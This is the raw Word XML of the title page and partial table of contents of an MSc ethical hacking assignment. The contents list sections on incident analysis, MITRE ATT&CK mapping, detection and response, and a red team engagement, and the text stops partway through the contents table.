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A40159" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="2AD482E8" w14:textId="68C05B94" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48CEE1E1" wp14:editId="55E2616C">
            <wp:extent cx="4752975" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="82447379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52975" cy="1895475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AED460" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>University of Wales Trinity Saint David</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F163567" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8FAB7E" w14:textId="19AEACCF" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00CC10EA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2FC8F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8FB01F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Name: Khushi Sangani</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05647B9F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Student ID: 2520615</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE72B85" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Course: MSc Cybersecurity and Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D8654" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Module: Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56783D9F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE0E80F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1833657D" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Lecturer: Dr. Mohamed Ghanem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF7D66" w14:textId="12CF0735" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00053404" w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DCA1E" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04">
      <w:r w:rsidRPr="00053404">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="557362C9" w14:textId="5548B9E9" w:rsidR="00115C04" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC10EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Index</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9923" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="7654"/>
        <w:gridCol w:w="1276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="761B9E82" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B06D71B" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sr. No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7076EDFD" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D94F22E" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Page No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="45A8E95E" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9CCC3A" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46538F3B" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Abstract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EAAB330" w14:textId="5CA9DF44" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="770E540F" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0D8613" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDD7952" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2484005A" w14:textId="6AA057EC" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="19079A35" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BBBBBB5" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C1CFD1F" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Incident Summary and Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F277D88" w14:textId="1CA6D5DB" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="39D603B0" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53B3A7E3" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3C97FE" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Adversary TTP Mapping (MITRE ATT&amp;CK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659FADA8" w14:textId="7C678E03" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="18B4EF4A" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625841DD" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE3ADB3" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Root Cause &amp; Security Control Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F8B93E1" w14:textId="34F0E912" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="22B159A5" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704CA779" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47C1B2A2" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Threat Actor Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CEEDD6C" w14:textId="42FCA17E" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="7C72ED7A" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C8C784" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="199ACBC0" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Detection &amp; Response Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62875273" w14:textId="18A55FA2" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="3D577DFF" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600D4A25" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E24BC6" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Strategic Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C81DF12" w14:textId="69FE9D8B" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="225D3649" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60896BE9" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12FDC667" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Conclusion (Task 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB12174" w14:textId="3799AB40" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="66A16733" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF84B82" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C75B4E3" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Executive Summary (Task 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA92948" w14:textId="7E89E882" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="42585477" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59010AA2" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1801D367" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Introduction (Red Team Engagement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
